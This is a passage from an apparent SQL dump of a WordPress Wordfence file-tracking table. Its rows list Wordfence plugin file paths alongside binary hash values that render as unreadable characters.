ӫrP,Q','',0,'?'),(',@Q','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\"sg4\\(8','@Zn\"ξ~QՔ8sP\073','',0,'?'),('BUjv\\ѣ(','wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y^@:Fgq]p!J','Ѝ]|\\͏\\G$y[\\J\"','',0,'?'),('llxL,7WN','wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h\r$o','l?9Rw\"H^\rs\ZD:Fa','',0,'?'),(']pR/$1','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M#Ƃ,nj9{','+N)¨L	Kz(','',0,'?'),('x|sKa','wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2o\0X#83~','$>\n\ZW)O\0(\nݮ\08','',0,'?'),('ˋ_o!\'ur','wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\ZtU2Ec0\'','úM..8ѹ>NwjZWb*B','',0,'?'),('qqC$@','wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aA\'4=Gg','R{hC;_	G+RzrTz`4','',0,'?'),('%G]f@%Z','wp-content/plugins/wordfence/views/common/section-subtitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KcDÃ۬','ZJwsh5MEu/jg[-','',0,'?'),('%?)','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w]QVմi','qr*-TN5\rOc;ma','',0,'?'),('w	+j','wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',').=g','q4^\"-9\nd1qO,','',0,'?'),('^O|\':QǙE','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q[[_Y[ʛJ{&','nI\Zg[\0MZ1]','',0,'?'),('sՌQ7o','wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѿD\0|sW','\n*vQ(Giu3@4*','',0,'?'),('#7rY\0i','wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%e\rFdE0sB','%MbuI]CI\n6z}B4','',0,'?'),('Dd.P˴{-yog','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mfuֺg-g\0C=v','N<\r;d*8+)\ZbO?0E','',0,'?'),('p̓02@PFtk','wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}}sJK','a\0k5	-\0oDx۠8u%\'','',0,'?'),('Mx1ǋTmR_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.1(>\ZVE~','Ih棗ht;a6N*z','',0,'?'),('{[/ڑ','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϤSZ2=ǌ^','\0Ԋw\Z)6Zp-lP-ND','',0,'?'),('bE4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z!Hмhڣ','(t$nèOҨ,B@,Lo|','',0,'?'),('~Ⱦ/mր!','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&m:7v=','\nqYۡ>h_P','',0,'?'),('̋qB3aY-','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6#>{zq\nS%M','pRA7ZQjCpNa=M','',0,'?'),('Q.ì\\XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':nn)','g #ztJȴY12cƳ\"Pow','',0,'?'),(',M;v','wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=S0lK@^=','υ<URY@*cs','',0,'?'),(' 5rDg籃','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oazve,','1vM8m gI4k\0y;/','',0,'?'),(']oMseJ4','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~H`b\0nvB JQ\"','F˲IG6gV)0k','',0,'?'),('PM˝=U','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','raX\'z\05+\"7','v$r_syYU{ؘ?C','',0,'?'),('7\0tt.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','an$6\"','tɢC-?\'(uꢦAT-1ba:','',0,'?'),('OSYWz!8ʣj','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*K`;\0}',',cn9۝$O`&pTOXiس','',0,'?'),('QcmuX\Z3B+X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!*o2¯$','TCWD9-Χ0(\ZJi','',0,'?'),('B!vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0͒l\0B',',{=#\nOQݥWpYEY2>X4h','',0,'?'),('mהF@$~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b՗ln','ya2-@\"=*\'','',0,'?'),('/7ñcxpg','wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ނ!)(N+U','#Ό|pPҰ,mkyt\r܏@6','',0,'?'),(';%N!9\nL&N','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yuJɶg','l3Ä\ncwx~eLhP\Zے9','',0,'?'),('3,cvk','wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iŮ9e`2','ZMGXL;$xMi|Q%ŽY2$_','',0,'?'),('+\ZDZe}','wp-content/plugins/wordfence/views/onboarding/plugin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kQ4ڌtS*','Qh9\07MN64>\\','',0,'?'),('\'Ac,	~6ܦ','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':% );\0','\Z\'ġ맪.s\'sd4^I','',0,'?'),('Zd*Yژ','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','95IB\"a','VG37R(@\n,\n	w','',0,'?'),('eҕhV\"','wp-content/plugins/wordfence/views/options/block-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8 5U,e\n4(','S|POdɇ&ٲ-','',0,'?'),(',\ZJ\'AWh','wp-content/plugins/wordfence/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Lgf','_\r\0\0Z}})v[4','',0,'?'),('``\'l`=X(','wp-content/plugins/wordfence/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q5C&','cU3AW\n(:F@zAgG&j9','',0,'?'),(' oƕt_\0.','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','miE>WcZaig','&՚j:g&*56yɨdq4֙','',0,'?'),('Җ6M֦5wH','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}KmwK5 IO','+dn\\/M+{x/(h\Z-z%1r','',0,'?'),('YmRlX\0:','wp-content/plugins/wordfence/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ac[DO+.f\Z','~?\\|q4τ>jW\06wQEg=z[','',0,'?'),('20mK:r²\\0\nB','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',+[Rֈ','lFVjFlV˱VǞB`','',0,'?'),('d\nv;O1:,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!0K܃5{PD(','{`α0HoG🨶Mo$P','',0,'?'),('.麉D0uL-c','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B|ssGo1x','\n9VW |:]\\)d^U#','',0,'?'),('$%#_U_d','wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"p+No+T','Xq?\'Є,Uэf[@aWh','',0,'?'),('\rzDD','wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z(a|Α]x','͏̽U$q9eg\Zrn_aHC','',0,'?'),('DT[-U','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','눣E	xbH$t','Fm0jC,W$=9nԫ','',0,'?'),('*	ą\\','wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']KrYwB','knS	3&Y=Ձ_+?Hƪ%','',0,'?'),('7ڔ!2x%XN3','wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY7o	_Ӏ?',' AQNe\ZywsG@ZI&L','',0,'?'),('몳@ =y`','wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E0\"#','֩y\n	ĳXH-<f	c','',0,'?'),('T??:q׮Pah\'','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MEu	wpe','x,Qz:3FߟґɊAY','',0,'?'),('Nd#R+r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t+Ty*=*xS',':w})]&nVM/Afof?{z-N','',0,'?'),('p{\r %>/Z:','wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǢϚtpAy','8PciCQVJ+6?pT6\Zzd','',0,'?'),('ܑKݓ%eP^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&#i]<{','EPmh>*HS8SFpXbdU8','',0,'?'),('%|ݽ>?v{j','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':>ޤ+~tͫ*','I|^ψg?nƏAd]68R','',0,'?'),('ep\r}u_4','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Xcb7qNS','MG] ?ugPp1,(V^','',0,'?'),('Du\rɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Z?d⢡','1XaRpLrIO%%|\rVge\0-b^n=','',0,'?'),('cG(`E','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' QL','R21?ǌ*=bͥ}X&MƷ','',0,'?'),('$|c \\~','wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ;͏(vpoq','z-\0Aj@ 8cT&՞','',0,'?'),('SHLenPq7č','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nZHUϘ','ݓ!#hlts):}*aEglTD','',0,'?'),('ΦHc^)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dd4\'T)','KPUwxd!)n1w<m.ǳf','',0,'?'),('(dwI\0:\rXx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y_V^\n%pc','dWgme˰5Ҡ:;W\'','',0,'?'),('\'@S D','wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Pm@n','4āLsFm\Z^\ZDQ','',0,'?'),(')6#_̟SAF','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[оڰA9(n','ߑJ[4#~H8ȉB9+/mv','',0,'?'),('u78¸KԊkh','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I6ϲē]','yh;}<6yZ$	M>K(\\#&\"\rej','',0,'?'),('eXǌ.\\(&d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','رm:h\rGZڋY','t8uUUSĒqfS3iiu','',0,'?'),('/0)\Z','wp-content/plugins/wordfence/views/scanner/issue-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ \nRoN7|','~❃gd&w[uo|t}','',0,'?'),('Xɘy_7XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z.*:î+1','\Zޔeg)QRCAm','',0,'?'),('Zm,Ei)','wp-content/plugins/wordfence/views/scanner/issue-dnsChange.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']vΆ.SH^wz','xg\\$CJ)ȶ>L','',0,'?'),('4\n	m]ĿЊ','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[+e[eϙfW','QAu&{AiXPK[{0Qk','',0,'?'),('VtS-','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?}Ɠ.Μe1U','MTzX`પmO]$sX','',0,'?'),(';fJ1˘+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0<^=f','s]ѽj$	↜Skik','',0,'?'),('BQaU%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G^=p=$\Z2','RK6N\"3*\"J/0ix0','',0,'?'),('wei!<sy\n','wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t\"N+՛L','67E0܃ՐC{\\adPb2+pW;P','',0,'?'),('㱛 V9{b','wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d+l@h','3i]m&	s֯Igeok/M','',0,'?'),('!<B4\ZS}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u@ަ$,','dٍ|]Q!Qw;`7Zf','',0,'?'),('\n#T?׻','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=3n.ZK7Rb~<','LؖknHN\n$ʨ#','',0,'?'),('n[	X}0','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%ؘ5aO_','3½}߈6-x%uv','',0,'?'),('$7y]N','wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P<\0cAFLN','R]`[2#XÉi(E\n`rJ','',0,'?'),('$SCkdW','wp-content/plugins/wordfence/views/scanner/issue-timelimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J7^њOi','5QgwBH.f<<Zh&V','',0,'?'),('d0ٷ\ZԌn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<38xuFRĖȦE','n?Qbz	٢)S*,Z','',0,'?'),('\"LJ1C4ND','wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jv[pջBM','	)Yt\rb/\Z㲰i\r88','',0,'?'),('=F혣ÆK&','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9:7]6hVo','߫/LkOTbdSEiL9~8','',0,'?'),(',\r	gH6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aRp#p','rL-RW&P!aS0T','',0,'?'),(';NQ>','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tvwX\n_Yg!','r;\Z G[i$)v]j7im#','',0,'?'),('rJ<p>Z','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9¡^-,措Eg','X0\rvfŭ-$ZuYS ','',0,'?'),('|T]:Y$=\'h','wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DOۏ~*s/','c^\0]*ζז\\T1msd# ^U','',0,'?'),('L.dDv','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i0j82\ns','v\\qY{S<|+{(m?)D=','',0,'?'),('mavMvK\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tGN8	6','YV)ceW/Zmҳn\'n\0MK~','',0,'?'),('zh9ꈦXp+','wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|Fe','_?7c:_@EJs[','',0,'?'),('C.yj\0o*f','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dzGf\'Pidi','T1%R2VPRJB\\ˈgen','',0,'?'),('sAsYD]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RYtO`6qz','cV*}zc*(6`=9no${','',0,'?'),('e}0wTnv_g~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',z7\nɲߞ','Ab.hNh|:H-=(1fJ','',0,'?'),('NTZto\r%F','wp-content/plugins/wordfence/views/scanner/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CyI\'LZ',']-;2Zvi4!Hᷳ','',0,'?'),(' ń1r}mJGWR','wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iLxЊsf','da16hr76[)ՋOM罒z','',0,'?'),('lxy\Z\"','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ź-܉|JU','V\rc7g6抭VmCP','',0,'?'),('<3v&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eۻ04r','H?MqK-4l_<*=܀ňp+','',0,'?'),('հ	̋ȲS','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' j<c(SCJ','r3H[~2.<_J3{T{XӼPq','',0,'?'),('|]D\Z.E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J!%IWb','tẁ~sg\n+A}bLNu','',0,'?'),('pխ^@#Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%\nrE?m','Qf\0.<:;6\"{N+mE','',0,'?'),('\'_iYm1R','wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8΂,\\','SHS6p_2*\rTD\0G9','',0,'?'),('4$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0W쮜)Ǣ±','b¥USw툒g:=P','',0,'?'),('F_qCF!o4p','wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E `b{{v\r','qFxgTA]Mk^>\'UB','',0,'?'),('D!VD+','wp-content/plugins/wordfence/views/scanner/scan-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Zb4ګ*','w.\0/\"kzvHQ6s&>`KRC','',0,'?'),('KKOfSdiB0Ov','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޑ[.ɕl\\:','&k0lcX**?\rܒ','',0,'?'),('9~\0{@','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',)Rqy|4.','%U<GH[.!e˂t,gsɄ','',0,'?'),('&#pJh','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Is0w4Q','E\"v+󴄏bo}xa{:@E','',0,'?'),('o}C܊8EG','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sTDzҧm','5؄:\"sx4Ҹ\09`\Zi?','',0,'?'),('Ŋ6@L(`','wp-content/plugins/wordfence/views/scanner/site-cleaning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5w1,5bdvF','g\"g2ߚ}qA?$)d','',0,'?'),('mñ~R?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ONjPv4','m]n>nFf;Gf-m_L4b\'','',0,'?'),('j5fj','wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5_+EG','s}RB|KzI[Y)r','',0,'?'),('/=+HhE14ʆ','wp-content/plugins/wordfence/views/tours/login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#?canՐSK\Z^','/a~-2y]yp!Y蝅EK_','',0,'?'),('֋8[0ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FM@i-M','	;B@EŻ߬ue}','',0,'?'),('y66lMC','wp-content/plugins/wordfence/views/waf/firewall-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lw\0i75G','\'WֵDrDBeH\n@\":=!M#f','',0,'?'),('÷g$Ms','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"ăEzZGS 0','4%pDM_Mi׽D{F','',0,'?'),('@\Z!zrWp','wp-content/plugins/wordfence/views/waf/option-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' {<\Z\0\r\Z$','4fŜ\"\"ł>2L\0\"k1S\nw','',0,'?'),('2X69G3\Z+}A6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ψ-˯3w','G_`8B؎P\n\",\'HŨ','',0,'?'),('zɐ@//@','wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IN~dFe','lBoS)ޥ9o!ǻm#$','',0,'?'),('[Ӄ2W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','03*66-FU.','TQ&n)&MgDgШ','',0,'?'),('K<H<7E,l','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŏqў¯/	\n','W_\rF_H\07	iatr؈M=','',0,'?'),('!y\'Ub#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȁ)\\Qq9F#','l$DЦm	,N8','',0,'?'),('gs)m%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ViK۹v?','-L#syܥjswBt\'ш;8=','',0,'?'),('nAj+uVG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ8l%','!]`_.\\? .\ZbɐGQe)m','',0,'?'),('=	]}*<.','wp-content/plugins/wordfence/views/waf/waf-install-manual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$x~)[ڜz','7R N`n^?()^RΚĖ','',0,'?'),('\\H:u3%Fw','wp-content/plugins/wordfence/views/waf/waf-install-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{rb^?','/\\2CeL+:pZ','',0,'?'),('ZDl=컫','wp-content/plugins/wordfence/views/waf/waf-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']cE^GMSf','\\H.T:ďg]B|͌|{=pǵ','',0,'?'),('u[D','wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nγUǩ7PF','f4֒p.Օ*^Nl8A','',0,'?'),('p:,`OlL(A','wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*sf2','|\rߣ2잿9/%[7m{Eu-','',0,'?'),('Ao\rZԔ_t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wxlMI\0lT㐥','lEN1-R|pG^;ï1','',0,'?'),('YJ|[DyY','wp-content/plugins/wordfence/waf/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),('Ha+̰I','wp-content/plugins/wordfence/waf/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z>86Ww ','VQ\\q;=<JA>F','',0,'?'),('X\\shv]iB','wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݇(0,mG_Y3','^)oBfg*VP?~u:','',0,'?'),('\0D`8Rɲ%','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}`iy','Tܯ19^ջP\'Ld%k|P؞','',0,'?'),('%7娳','wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yFH\'\'nގ','KD[Rஞ 5:grP7*X\Z','',0,'?'),('E#-v376Ť','wp-content/plugins/wordfence/wordfence.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g܃dKg0T','y{+Ox.-,g\Zt{[[?p{','',0,'?'),('݁Lrv?)','wp-content/plugins/wp-optimize/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9o*n+/','\0v1sN>cID٦I0